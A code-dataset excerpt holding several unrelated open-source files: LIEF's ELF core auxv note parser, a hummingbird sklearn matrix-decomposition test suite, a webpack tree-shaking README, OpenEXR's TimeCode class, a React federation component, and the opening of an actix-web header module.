code stringlengths 1 25.8M | language stringclasses 18 values | source stringclasses 4 values | repo stringclasses 78 values | path stringlengths 0 268 |
|---|---|---|---|---|
/* Copyright 2017 - 2025 R. Thomas
* Copyright 2017 - 2025 Quarkslab
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include "LIEF/ELF/hash.hpp"
#include "LIEF/ELF/NoteDetails/core/CoreAuxv.hpp"
#include "LIEF/Visitor.hpp"
#include "LIEF/iostream.hpp"
#include "LIEF/BinaryStream/SpanStream.hpp"
#include "frozen.hpp"
#include "spdlog/fmt/fmt.h"
#include "ELF/Structures.hpp"
namespace LIEF {
namespace ELF {
// Linearly scan the auxv note payload for the first entry matching `type`.
//
// The description is a flat array of Elf_Auxv records (a_type / a_un.a_val
// pairs) terminated by an END entry; returns the matching value, or
// lief_errors::not_found when the terminator or the end of the stream is
// reached first.
template<class ELF_T> inline result<uint64_t>
get_impl(CoreAuxv::TYPE type, const Note::description_t& desc) {
  using Elf_Auxv = typename ELF_T::Elf_Auxv;
  auto stream = SpanStream::from_vector(desc);
  if (!stream) {
    // Could not wrap the description buffer: forward the stream error.
    return make_error_code(get_error(stream));
  }
  while (*stream) {
    auto auxv = stream->read<Elf_Auxv>();
    if (!auxv) {
      // Truncated entry at the end of the payload.
      return make_error_code(lief_errors::not_found);
    }
    const auto atype = static_cast<CoreAuxv::TYPE>(auxv->a_type);
    auto value = auxv->a_un.a_val;
    if (atype == CoreAuxv::TYPE::END) {
      // Terminator reached without finding `type`.
      return make_error_code(lief_errors::not_found);
    }
    if (atype == type) {
      return static_cast<uint64_t>(value);
    }
  }
  return make_error_code(lief_errors::not_found);
}
// Decode the whole auxv note payload into a {type -> value} map.
//
// Stops at the END terminator or at the first truncated/unreadable entry;
// whatever was decoded up to that point is returned (possibly empty).
template<class ELF_T> inline std::map<CoreAuxv::TYPE, uint64_t>
get_values_impl(const Note::description_t& desc) {
  using Elf_Auxv = typename ELF_T::Elf_Auxv;
  auto stream = SpanStream::from_vector(desc);
  if (!stream) {
    return {};
  }
  std::map<CoreAuxv::TYPE, uint64_t> values;
  while (*stream) {
    auto auxv = stream->read<Elf_Auxv>();
    if (!auxv) {
      // Truncated entry: return what we have so far.
      return values;
    }
    const auto atype = static_cast<CoreAuxv::TYPE>(auxv->a_type);
    auto value = auxv->a_un.a_val;
    if (atype == CoreAuxv::TYPE::END) {
      return values;
    }
    // Later duplicates overwrite earlier ones.
    values[atype] = static_cast<uint64_t>(value);
  }
  return values;
}
// Serialize `values` as a flat array of Elf_Auxv records into `description`,
// always appending a terminating END entry with a zero value.
//
// A user-provided END entry is ignored: END is written exactly once, last.
template<class ELF_T>
inline bool write_impl(Note::description_t& description,
                       const std::map<CoreAuxv::TYPE, uint64_t>& values)
{
  using Elf_Auxv = typename ELF_T::Elf_Auxv;
  using ptr_t = typename ELF_T::uint;
  vector_iostream io;
  // +1 accounts for the mandatory END terminator appended below, so the
  // buffer is sized in a single reservation (the original reservation was
  // one record short whenever `values` contained no END entry).
  io.reserve((values.size() + 1) * sizeof(Elf_Auxv));
  for (const auto& [type, value] : values) {
    // This will be added at the end
    if (type == CoreAuxv::TYPE::END) {
      continue;
    }
    io.write(static_cast<ptr_t>(type))
      .write(static_cast<ptr_t>(value));
  }
  io.write(static_cast<ptr_t>(CoreAuxv::TYPE::END))
    .write(static_cast<ptr_t>(0));
  io.move(description);
  return true;
}
// Look up a single auxv value, parsing the payload with the record width
// that matches the note's ELF class (32- vs 64-bit Elf_Auxv).
result<uint64_t> CoreAuxv::get(TYPE type) const {
  return class_ == Header::CLASS::ELF32 ?
         get_impl<details::ELF32>(type, description_) :
         get_impl<details::ELF64>(type, description_);
}

// Decode all auxv entries into a map (see get_values_impl).
std::map<CoreAuxv::TYPE, uint64_t> CoreAuxv::values() const {
  return class_ == Header::CLASS::ELF32 ?
         get_values_impl<details::ELF32>(description_) :
         get_values_impl<details::ELF64>(description_);
}

// Set (or overwrite) a single auxv entry by re-serializing the whole
// payload with the updated map.
bool CoreAuxv::set(TYPE type, uint64_t value) {
  std::map<TYPE, uint64_t> vals = values();
  vals[type] = value;
  return set(vals);
}

// Serialize `values` back into the note description with the record width
// that matches the note's ELF class.
bool CoreAuxv::set(const std::map<TYPE, uint64_t>& values) {
  return class_ == Header::CLASS::ELF32 ?
         write_impl<details::ELF32>(description_, values) :
         write_impl<details::ELF64>(description_, values);
}
// Print the generic note header followed by one "TYPE: 0xVALUE" line per
// decoded auxv entry; prints nothing extra when no entry decodes.
void CoreAuxv::dump(std::ostream& os) const {
  Note::dump(os);
  const auto& aux_vals = values();
  if (aux_vals.empty()) {
    return;
  }
  os << '\n';
  for (const auto& [type, val] : aux_vals) {
    os << fmt::format(" {}: 0x{:08x}\n", to_string(type), val);
  }
}

// Standard visitor dispatch.
void CoreAuxv::accept(Visitor& visitor) const {
  visitor.visit(*this);
}
// Human-readable name of an auxv TYPE; returns "UNKNOWN" for values that
// are not part of the enumeration.
const char* to_string(CoreAuxv::TYPE type) {
  #define ENTRY(X) std::pair(CoreAuxv::TYPE::X, #X)
  STRING_MAP enums2str {
    ENTRY(END),
    ENTRY(IGNORE_TY),
    ENTRY(EXECFD),
    ENTRY(PHDR),
    ENTRY(PHENT),
    ENTRY(PHNUM),
    ENTRY(PAGESZ),
    ENTRY(BASE),
    ENTRY(FLAGS),
    ENTRY(ENTRY),
    ENTRY(NOTELF),
    ENTRY(UID),
    ENTRY(EUID),
    ENTRY(GID),
    ENTRY(EGID),
    ENTRY(TGT_PLATFORM),
    ENTRY(HWCAP),
    ENTRY(CLKTCK),
    ENTRY(FPUCW),
    ENTRY(DCACHEBSIZE),
    ENTRY(ICACHEBSIZE),
    ENTRY(UCACHEBSIZE),
    ENTRY(IGNOREPPC),
    ENTRY(SECURE),
    ENTRY(BASE_PLATFORM),
    ENTRY(RANDOM),
    ENTRY(HWCAP2),
    ENTRY(EXECFN),
    ENTRY(SYSINFO),
    ENTRY(SYSINFO_EHDR),
  };
  #undef ENTRY
  if (auto it = enums2str.find(type); it != enums2str.end()) {
    return it->second;
  }
  return "UNKNOWN";
}
} // namespace ELF
} // namespace LIEF | cpp | github | https://github.com/nodejs/node | deps/LIEF/src/ELF/NoteDetails/core/CoreAuxv.cpp |
"""
Tests sklearn matrix decomposition converters
"""
import unittest
import warnings
import sys
from distutils.version import LooseVersion
import numpy as np
import torch
import sklearn
from sklearn.decomposition import FastICA, KernelPCA, PCA, TruncatedSVD
from sklearn.model_selection import train_test_split
from sklearn.datasets import load_digits
import hummingbird.ml
class TestSklearnMatrixDecomposition(unittest.TestCase):
    """Tests converting sklearn matrix decomposition models (PCA, KernelPCA,
    FastICA, TruncatedSVD) to torch with hummingbird."""
    def _fit_model_pca(self, model, precompute=False):
        """Fit `model` on the digits dataset, convert it to torch, and assert
        that sklearn's and the torch model's transform() outputs agree
        within tolerance.

        When `precompute` is True, the model is fed a precomputed linear
        (Gram) kernel matrix, as required by KernelPCA(kernel="precomputed").
        """
        data = load_digits()
        X_train, X_test, y_train, y_test = train_test_split(data.data, data.target, test_size=0.2, random_state=42)
        X_test = X_test.astype("float32")
        if precompute:
            # For precompute we use a linear kernel
            model.fit(np.dot(X_train, X_train.T))
            X_test = np.dot(X_test, X_train.T)
        else:
            model.fit(X_train)
        torch_model = hummingbird.ml.convert(model, "torch")
        self.assertTrue(torch_model is not None)
        np.testing.assert_allclose(model.transform(X_test), torch_model.transform(X_test), rtol=1e-6, atol=2 * 1e-5)
    # PCA n_components none
    def test_pca_converter_none(self):
        self._fit_model_pca(PCA(n_components=None))
    # PCA n_components two
    def test_pca_converter_two(self):
        self._fit_model_pca(PCA(n_components=2))
    # PCA n_components mle and whiten true
    @unittest.skipIf(
        LooseVersion(sklearn.__version__) < LooseVersion("0.23.2"),
        reason="With Sklearn version < 0.23.2 returns ValueError: math domain error (https://github.com/scikit-learn/scikit-learn/issues/4441)",
    )
    def test_pca_converter_mle_whiten(self):
        self._fit_model_pca(PCA(n_components="mle", whiten=True))
    # PCA n_components mle and solver full
    @unittest.skipIf(
        LooseVersion(sklearn.__version__) < LooseVersion("0.23.2"),
        reason="With Sklearn version < 0.23.2 returns ValueError: math domain error (https://github.com/scikit-learn/scikit-learn/issues/4441)",
    )
    def test_pca_converter_mle_full(self):
        self._fit_model_pca(PCA(n_components="mle", svd_solver="full"))
    # PCA n_components none and solver arpack
    def test_pca_converter_none_arpack(self):
        self._fit_model_pca(PCA(n_components=None, svd_solver="arpack"))
    # PCA n_components none and solver randomized
    def test_pca_converter_none_randomized(self):
        self._fit_model_pca(PCA(n_components=None, svd_solver="randomized"))
    # KernelPCA linear kernel
    def test_kernel_pca_converter_linear(self):
        self._fit_model_pca(KernelPCA(n_components=5, kernel="linear"))
    # KernelPCA linear kernel with inverse transform
    def test_kernel_pca_converter_linear_fit_inverse_transform(self):
        self._fit_model_pca(KernelPCA(n_components=5, kernel="linear", fit_inverse_transform=True))
    # KernelPCA poly kernel
    def test_kernel_pca_converter_poly(self):
        self._fit_model_pca(KernelPCA(n_components=5, kernel="poly", degree=2))
    # KernelPCA poly kernel coef0
    def test_kernel_pca_converter_poly_coef0(self):
        self._fit_model_pca(KernelPCA(n_components=10, kernel="poly", degree=3, coef0=10))
    # KernelPCA poly kernel with inverse transform
    def test_kernel_pca_converter_poly_fit_inverse_transform(self):
        self._fit_model_pca(KernelPCA(n_components=5, kernel="poly", degree=3, fit_inverse_transform=True))
    # KernelPCA rbf kernel
    def test_kernel_pca_converter_rbf(self):
        self._fit_model_pca(KernelPCA(n_components=5, kernel="rbf"))
    # KernelPCA sigmoid kernel
    def test_kernel_pca_converter_sigmoid(self):
        self._fit_model_pca(KernelPCA(n_components=5, kernel="sigmoid"))
    # KernelPCA cosine kernel
    def test_kernel_pca_converter_cosine(self):
        self._fit_model_pca(KernelPCA(n_components=5, kernel="cosine"))
    # KernelPCA precomputed kernel
    def test_kernel_pca_converter_precomputed(self):
        self._fit_model_pca(KernelPCA(n_components=5, kernel="precomputed"), precompute=True)
    # TODO: Fails on macos-latest Python 3.8 due to a sklearn bug.
    # FastICA converter with n_components none
    # def test_fast_ica_converter_none(self):
    #     self._fit_model_pca(FastICA(n_components=None))
    # FastICA converter with n_components 3
    def test_fast_ica_converter_3(self):
        self._fit_model_pca(FastICA(n_components=3))
    # FastICA converter with n_components 3 whiten
    def test_fast_ica_converter_3_whiten(self):
        self._fit_model_pca(FastICA(n_components=3, whiten=True))
    # FastICA converter with n_components 3 deflation algorithm
    def test_fast_ica_converter_3_deflation(self):
        self._fit_model_pca(FastICA(n_components=3, algorithm="deflation"))
    # FastICA converter with n_components 3 fun exp
    def test_fast_ica_converter_3_exp(self):
        self._fit_model_pca(FastICA(n_components=3, fun="exp"))
    # FastICA converter with n_components 3 fun cube
    def test_fast_ica_converter_3_cube(self):
        self._fit_model_pca(FastICA(n_components=3, fun="cube"))
    # FastICA converter with n_components 3 fun custom
    def test_fast_ica_converter_3_custom(self):
        # Custom contrast function: G(x) = x^3 with derivative mean 3x^2.
        def my_g(x):
            return x ** 3, (3 * x ** 2).mean(axis=-1)
        self._fit_model_pca(FastICA(n_components=3, fun=my_g))
    # TruncatedSVD converter with n_components 3
    def test_truncated_svd_converter_3(self):
        self._fit_model_pca(TruncatedSVD(n_components=3))
    # TruncatedSVD converter with n_components 3 algorithm arpack
    def test_truncated_svd_converter_3_arpack(self):
        self._fit_model_pca(TruncatedSVD(n_components=3, algorithm="arpack"))
if __name__ == "__main__":
unittest.main() | unknown | codeparrot/codeparrot-clean | ||
# example.js
```javascript
const inc = require("./increment").increment;
var a = 1;
inc(a); // 2
```
# increment.js
```javascript
const add = require("./math").add;
exports.increment = function increment(val) {
return add(val, 1);
};
exports.incrementBy2 = function incrementBy2(val) {
return add(val, 2);
};
exports.decrement = function decrement(val) {
return add(val, 1);
};
```
# math.js
```javascript
exports.add = function add() {
var sum = 0,
i = 0,
args = arguments,
l = args.length;
while (i < l) {
sum += args[i++];
}
return sum;
};
exports.multiply = function multiply() {
var product = 0,
i = 0,
args = arguments,
l = args.length;
while (i < l) {
sum *= args[i++];
}
return sum;
};
```
# dist/output.js
```javascript
/******/ (() => { // webpackBootstrap
/******/ var __webpack_modules__ = ([
/* 0 */,
/* 1 */
/*!**********************!*\
!*** ./increment.js ***!
\**********************/
/*! default exports */
/*! export decrement [provided] [unused] [renamed to Kt] */
/*! export increment [provided] [used in main] [renamed to GV] */
/*! export incrementBy2 [provided] [unused] [renamed to Bd] */
/*! runtime requirements: __webpack_require__, __webpack_exports__ */
/***/ ((__unused_webpack_module, exports, __webpack_require__) => {
var __webpack_unused_export__;
const add = (__webpack_require__(/*! ./math */ 2)/* .add */ .W);
exports.GV = function increment(val) {
return add(val, 1);
};
__webpack_unused_export__ = function incrementBy2(val) {
return add(val, 2);
};
__webpack_unused_export__ = function decrement(val) {
return add(val, 1);
};
/***/ }),
/* 2 */
/*!*****************!*\
!*** ./math.js ***!
\*****************/
/*! default exports */
/*! export add [provided] [used in main] [renamed to W] */
/*! export multiply [provided] [unused] [renamed to l] */
/*! runtime requirements: __webpack_exports__ */
/***/ ((__unused_webpack_module, exports) => {
var __webpack_unused_export__;
exports.W = function add() {
var sum = 0,
i = 0,
args = arguments,
l = args.length;
while (i < l) {
sum += args[i++];
}
return sum;
};
__webpack_unused_export__ = function multiply() {
var product = 0,
i = 0,
args = arguments,
l = args.length;
while (i < l) {
sum *= args[i++];
}
return sum;
};
/***/ })
/******/ ]);
```
<details><summary><code>/* webpack runtime code */</code></summary>
``` js
/************************************************************************/
/******/ // The module cache
/******/ var __webpack_module_cache__ = {};
/******/
/******/ // The require function
/******/ function __webpack_require__(moduleId) {
/******/ // Check if module is in cache
/******/ var cachedModule = __webpack_module_cache__[moduleId];
/******/ if (cachedModule !== undefined) {
/******/ return cachedModule.exports;
/******/ }
/******/ // Check if module exists (development only)
/******/ if (__webpack_modules__[moduleId] === undefined) {
/******/ var e = new Error("Cannot find module '" + moduleId + "'");
/******/ e.code = 'MODULE_NOT_FOUND';
/******/ throw e;
/******/ }
/******/ // Create a new module (and put it into the cache)
/******/ var module = __webpack_module_cache__[moduleId] = {
/******/ // no module.id needed
/******/ // no module.loaded needed
/******/ exports: {}
/******/ };
/******/
/******/ // Execute the module function
/******/ __webpack_modules__[moduleId](module, module.exports, __webpack_require__);
/******/
/******/ // Return the exports of the module
/******/ return module.exports;
/******/ }
/******/
/************************************************************************/
```
</details>
``` js
var __webpack_exports__ = {};
// This entry needs to be wrapped in an IIFE because it needs to be isolated against other modules in the chunk.
(() => {
/*!********************!*\
!*** ./example.js ***!
\********************/
/*! unknown exports (runtime-defined) */
/*! runtime requirements: __webpack_require__ */
const inc = (__webpack_require__(/*! ./increment */ 1)/* .increment */ .GV);
var a = 1;
inc(a); // 2
})();
/******/ })()
;
```
# dist/output.js (production)
```javascript
/*! For license information please see output.js.LICENSE.txt */
(()=>{var r=[,(r,n,o)=>{const t=o(2).W;n.GV=function(r){return t(r,1)}},(r,n)=>{n.W=function(){for(var r=0,n=0,o=arguments,t=o.length;n<t;)r+=o[n++];return r}}],n={};(0,function o(t){var e=n[t];if(void 0!==e)return e.exports;if(void 0===r[t]){var i=new Error("Cannot find module '"+t+"'");throw i.code="MODULE_NOT_FOUND",i}var u=n[t]={exports:{}};return r[t](u,u.exports,o),u.exports}(1).GV)(1)})();
```
# dist/without.js (same without tree shaking)
```javascript
/*! For license information please see without.js.LICENSE.txt */
(()=>{var r=[,(r,n,t)=>{const e=t(2).add;n.increment=function(r){return e(r,1)},n.incrementBy2=function(r){return e(r,2)},n.decrement=function(r){return e(r,1)}},(r,n)=>{n.add=function(){for(var r=0,n=0,t=arguments,e=t.length;n<e;)r+=t[n++];return r},n.multiply=function(){for(var r=0,n=arguments,t=n.length;r<t;)sum*=n[r++];return sum}}],n={};(0,function t(e){var o=n[e];if(void 0!==o)return o.exports;if(void 0===r[e]){var u=new Error("Cannot find module '"+e+"'");throw u.code="MODULE_NOT_FOUND",u}var i=n[e]={exports:{}};return r[e](i,i.exports,t),i.exports}(1).increment)(1)})();
```
# Info
## Unoptimized
```
asset output.js 3.2 KiB [emitted] (name: main)
chunk (runtime: main) output.js (main) 634 bytes [entry] [rendered]
> ./example.js main
dependent modules 564 bytes [dependent] 2 modules
./example.js 70 bytes [built] [code generated]
[no exports used]
entry ./example.js main
webpack X.X.X compiled successfully
asset without.js 3.34 KiB [emitted] (name: main)
chunk (runtime: main) without.js (main) 634 bytes [entry] [rendered]
> ./example.js main
dependent modules 564 bytes [dependent] 2 modules
./example.js 70 bytes [built] [code generated]
[used exports unknown]
entry ./example.js main
webpack X.X.X compiled successfully
```
## Production mode
```
asset output.js 463 bytes [emitted] [minimized] (name: main) 1 related asset
chunk (runtime: main) output.js (main) 634 bytes [entry] [rendered]
> ./example.js main
dependent modules 564 bytes [dependent] 2 modules
./example.js 70 bytes [built] [code generated]
[no exports used]
entry ./example.js main
webpack X.X.X compiled successfully
asset without.js 649 bytes [emitted] [minimized] (name: main) 1 related asset
chunk (runtime: main) without.js (main) 634 bytes [entry] [rendered]
> ./example.js main
dependent modules 564 bytes [dependent] 2 modules
./example.js 70 bytes [built] [code generated]
[used exports unknown]
entry ./example.js main
webpack X.X.X compiled successfully
``` | unknown | github | https://github.com/webpack/webpack | examples/cjs-tree-shaking/README.md |
///////////////////////////////////////////////////////////////////////////
//
// Copyright (c) 2004, Industrial Light & Magic, a division of Lucas
// Digital Ltd. LLC
//
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Industrial Light & Magic nor the names of
// its contributors may be used to endorse or promote products derived
// from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
//
///////////////////////////////////////////////////////////////////////////
//-----------------------------------------------------------------------------
//
// class TimeCode
//
//-----------------------------------------------------------------------------
#include <ImfTimeCode.h>
#include "Iex.h"
#include "ImfNamespace.h"
OPENEXR_IMF_INTERNAL_NAMESPACE_SOURCE_ENTER
TimeCode::TimeCode ()
{
    // Zero time code: 00:00:00:00, all flags clear, empty user data.
    _time = 0;
    _user = 0;
}


// Construct from broken-down fields.  Each setter below validates its
// argument's range (throwing IEX_NAMESPACE::ArgExc on failure) and packs
// the value into the appropriate bits of _time or _user.
TimeCode::TimeCode
    (int hours,
     int minutes,
     int seconds,
     int frame,
     bool dropFrame,
     bool colorFrame,
     bool fieldPhase,
     bool bgf0,
     bool bgf1,
     bool bgf2,
     int binaryGroup1,
     int binaryGroup2,
     int binaryGroup3,
     int binaryGroup4,
     int binaryGroup5,
     int binaryGroup6,
     int binaryGroup7,
     int binaryGroup8)
{
    setHours (hours);
    setMinutes (minutes);
    setSeconds (seconds);
    setFrame (frame);
    setDropFrame (dropFrame);
    setColorFrame (colorFrame);
    setFieldPhase (fieldPhase);
    setBgf0 (bgf0);
    setBgf1 (bgf1);
    setBgf2 (bgf2);
    setBinaryGroup (1, binaryGroup1);
    setBinaryGroup (2, binaryGroup2);
    setBinaryGroup (3, binaryGroup3);
    setBinaryGroup (4, binaryGroup4);
    setBinaryGroup (5, binaryGroup5);
    setBinaryGroup (6, binaryGroup6);
    setBinaryGroup (7, binaryGroup7);
    setBinaryGroup (8, binaryGroup8);
}


// Construct from pre-packed 32-bit words (see setTimeAndFlags for the
// supported packings).
TimeCode::TimeCode
    (unsigned int timeAndFlags,
     unsigned int userData,
     Packing packing)
{
    setTimeAndFlags (timeAndFlags, packing);
    setUserData (userData);
}


TimeCode::TimeCode (const TimeCode &other)
{
    // Member-wise copy; the object holds only two 32-bit words.
    _time = other._time;
    _user = other._user;
}


TimeCode &
TimeCode::operator = (const TimeCode &other)
{
    // Self-assignment safe: only copies two scalar members.
    _time = other._time;
    _user = other._user;
    return *this;
}


bool
TimeCode::operator == (const TimeCode & c) const
{
    // Equal iff both the packed time/flags word and the user data match.
    return (_time == c._time && _user == c._user);
}


bool
TimeCode::operator != (const TimeCode & c) const
{
    return (_time != c._time || _user != c._user);
}
namespace {

// Return bits [minBit, maxBit] (inclusive) of `value`, shifted down so
// the lowest selected bit lands at bit 0.
unsigned int
bitField (unsigned int value, int minBit, int maxBit)
{
    const unsigned int mask = (~(~0U << (maxBit - minBit + 1)) << minBit);
    return (value & mask) >> minBit;
}


// Overwrite bits [minBit, maxBit] (inclusive) of `value` with `field`;
// bits of `field` beyond the field width are discarded.
void
setBitField (unsigned int &value, int minBit, int maxBit, unsigned int field)
{
    const unsigned int mask = (~(~0U << (maxBit - minBit + 1)) << minBit);
    value = (value & ~mask) | ((field << minBit) & mask);
}


// Convert a two-digit BCD byte (e.g. 0x59) to its decimal value (59).
int
bcdToBinary (unsigned int bcd)
{
    const unsigned int units = bcd & 0x0f;
    const unsigned int tens = (bcd >> 4) & 0x0f;
    return int (units + 10 * tens);
}


// Convert a decimal value in [0, 99] to two-digit BCD.
unsigned int
binaryToBcd (int binary)
{
    const int units = binary % 10;
    const int tens = (binary / 10) % 10;
    return (unsigned int) (units | (tens << 4));
}

} // namespace
// The time fields are stored BCD-encoded in _time:
//   hours   bits 24-29,  minutes bits 16-22,
//   seconds bits  8-14,  frame   bits  0-5.
// Each setter validates its range and throws IEX_NAMESPACE::ArgExc on
// failure.

int
TimeCode::hours () const
{
    return bcdToBinary (bitField (_time, 24, 29));
}


void
TimeCode::setHours (int value)
{
    if (value < 0 || value > 23)
        throw IEX_NAMESPACE::ArgExc ("Cannot set hours field in time code. "
                                     "New value is out of range.");

    setBitField (_time, 24, 29, binaryToBcd (value));
}


int
TimeCode::minutes () const
{
    return bcdToBinary (bitField (_time, 16, 22));
}


void
TimeCode::setMinutes (int value)
{
    if (value < 0 || value > 59)
        throw IEX_NAMESPACE::ArgExc ("Cannot set minutes field in time code. "
                                     "New value is out of range.");

    setBitField (_time, 16, 22, binaryToBcd (value));
}


int
TimeCode::seconds () const
{
    return bcdToBinary (bitField (_time, 8, 14));
}


void
TimeCode::setSeconds (int value)
{
    if (value < 0 || value > 59)
        throw IEX_NAMESPACE::ArgExc ("Cannot set seconds field in time code. "
                                     "New value is out of range.");

    setBitField (_time, 8, 14, binaryToBcd (value));
}


int
TimeCode::frame () const
{
    return bcdToBinary (bitField (_time, 0, 5));
}


void
TimeCode::setFrame (int value)
{
    if (value < 0 || value > 59)
        throw IEX_NAMESPACE::ArgExc ("Cannot set frame field in time code. "
                                     "New value is out of range.");

    setBitField (_time, 0, 5, binaryToBcd (value));
}
// Single-bit flags stored in _time (internal/TV60 layout):
//   dropFrame bit 6, colorFrame bit 7, fieldPhase bit 15,
//   bgf0 bit 23, bgf1 bit 30, bgf2 bit 31.

bool
TimeCode::dropFrame () const
{
    return !!bitField (_time, 6, 6);
}


void
TimeCode::setDropFrame (bool value)
{
    setBitField (_time, 6, 6, (unsigned int) !!value);
}


bool
TimeCode::colorFrame () const
{
    return !!bitField (_time, 7, 7);
}


void
TimeCode::setColorFrame (bool value)
{
    setBitField (_time, 7, 7, (unsigned int) !!value);
}


bool
TimeCode::fieldPhase () const
{
    return !!bitField (_time, 15, 15);
}


void
TimeCode::setFieldPhase (bool value)
{
    setBitField (_time, 15, 15, (unsigned int) !!value);
}


bool
TimeCode::bgf0 () const
{
    return !!bitField (_time, 23, 23);
}


void
TimeCode::setBgf0 (bool value)
{
    setBitField (_time, 23, 23, (unsigned int) !!value);
}


bool
TimeCode::bgf1 () const
{
    return !!bitField (_time, 30, 30);
}


void
TimeCode::setBgf1 (bool value)
{
    setBitField (_time, 30, 30, (unsigned int) !!value);
}


bool
TimeCode::bgf2 () const
{
    return !!bitField (_time, 31, 31);
}


void
TimeCode::setBgf2 (bool value)
{
    setBitField (_time, 31, 31, (unsigned int) !!value);
}
// Binary groups 1-8 occupy 4 bits each in the user data word
// (group 1 = bits 0-3, group 8 = bits 28-31).
int
TimeCode::binaryGroup (int group) const
{
    if (group < 1 || group > 8)
        throw IEX_NAMESPACE::ArgExc ("Cannot extract binary group from time code "
                                     "user data. Group number is out of range.");

    int minBit = 4 * (group - 1);
    int maxBit = minBit + 3;
    return int (bitField (_user, minBit, maxBit));
}
// Store a 4-bit value into binary group `group` (1-8) of the user data
// word.  Only the low 4 bits of `value` are kept: setBitField masks the
// field, so larger values are silently truncated.
//
// Throws IEX_NAMESPACE::ArgExc when `group` is outside 1-8.  The original
// message was copy-pasted from binaryGroup() and wrongly said "Cannot
// extract"; it now describes the set operation.
void
TimeCode::setBinaryGroup (int group, int value)
{
    if (group < 1 || group > 8)
        throw IEX_NAMESPACE::ArgExc ("Cannot set binary group in time code "
                                     "user data. Group number is out of range.");

    int minBit = 4 * (group - 1);
    int maxBit = minBit + 3;
    setBitField (_user, minBit, maxBit, (unsigned int) value);
}
// Pack the time and flag bits into a single 32-bit word laid out according
// to `packing`.
//
// _time is kept internally in the TV60 layout; TV50 relocates the four
// flag bits (bgf0/bgf2/bgf1/fieldPhase) and FILM24 has no dropFrame /
// colorFrame bits.  All masks use unsigned literals: the original
// (1 << 31) shifts into the sign bit of a 32-bit signed int, which is
// undefined behavior.
unsigned int
TimeCode::timeAndFlags (Packing packing) const
{
    if (packing == TV50_PACKING)
    {
        unsigned int t = _time;

        // Clear dropFrame plus the four flag bits, then re-insert the
        // flags at their TV50 positions.
        t &= ~((1U << 6) | (1U << 15) | (1U << 23) | (1U << 30) | (1U << 31));

        t |= ((unsigned int) bgf0() << 15);
        t |= ((unsigned int) bgf2() << 23);
        t |= ((unsigned int) bgf1() << 30);
        t |= ((unsigned int) fieldPhase() << 31);

        return t;
    }

    if (packing == FILM24_PACKING)
    {
        return _time & ~((1U << 6) | (1U << 7));
    }
    else // packing == TV60_PACKING
    {
        return _time;
    }
}
// Unpack a 32-bit time-and-flags word laid out according to `packing`
// into the canonical internal (TV60) layout of _time.
//
// All masks use unsigned literals: the original (1 << 31) shifts into the
// sign bit of a 32-bit signed int, which is undefined behavior.
void
TimeCode::setTimeAndFlags (unsigned int value, Packing packing)
{
    if (packing == TV50_PACKING)
    {
        // Clear dropFrame and the four flag bits, then translate the TV50
        // flag positions back to their internal (TV60) positions.
        _time = value &
                ~((1U << 6) | (1U << 15) | (1U << 23) | (1U << 30) | (1U << 31));

        if (value & (1U << 15))
            setBgf0 (true);

        if (value & (1U << 23))
            setBgf2 (true);

        if (value & (1U << 30))
            setBgf1 (true);

        if (value & (1U << 31))
            setFieldPhase (true);
    }
    else if (packing == FILM24_PACKING)
    {
        // FILM24 carries no dropFrame/colorFrame bits.
        _time = value & ~((1U << 6) | (1U << 7));
    }
    else // packing == TV60_PACKING
    {
        _time = value;
    }
}
// The raw 32-bit user data word (binary groups 1-8, 4 bits each).
unsigned int
TimeCode::userData () const
{
    return _user;
}


void
TimeCode::setUserData (unsigned int value)
{
    _user = value;
}
OPENEXR_IMF_INTERNAL_NAMESPACE_SOURCE_EXIT | cpp | github | https://github.com/opencv/opencv | 3rdparty/openexr/IlmImf/ImfTimeCode.cpp |
import React from "react";
import { formatRelative, subDays } from "date-fns";
// Demo remote component for the module-federation example: renders a framed
// box and formats "3 days ago" with date-fns, using the locale object
// supplied by the host application.
const Component = ({ locale }) => (
  <div style={{ border: "5px solid darkred" }}>
    <p>I'm a Component exposed from container C!</p>
    <p>
      Using date-fn in Remote:{" "}
      {formatRelative(subDays(new Date(), 3), new Date(), { locale })}
    </p>
  </div>
);
export default Component; | javascript | github | https://github.com/webpack/webpack | examples/module-federation/src-c/Component.js |
//! A Collection of Header implementations for common HTTP Headers.
//!
//! ## Mime Types
//! Several header fields use MIME values for their contents. Keeping with the strongly-typed theme,
//! the [mime] crate is used in such headers as [`ContentType`] and [`Accept`].
use std::fmt;
// re-export from actix-http
// - header name / value types
// - relevant traits for converting to header name / value
// - all const header names
// - header map
// - the few typed headers from actix-http
// - header parsing utils
pub use actix_http::header::*;
use bytes::{Bytes, BytesMut};
mod accept;
mod accept_charset;
mod accept_encoding;
mod accept_language;
mod allow;
mod cache_control;
mod content_disposition;
mod content_language;
mod content_length;
mod content_range;
mod content_type;
mod date;
mod encoding;
mod entity;
mod etag;
mod expires;
mod if_match;
mod if_modified_since;
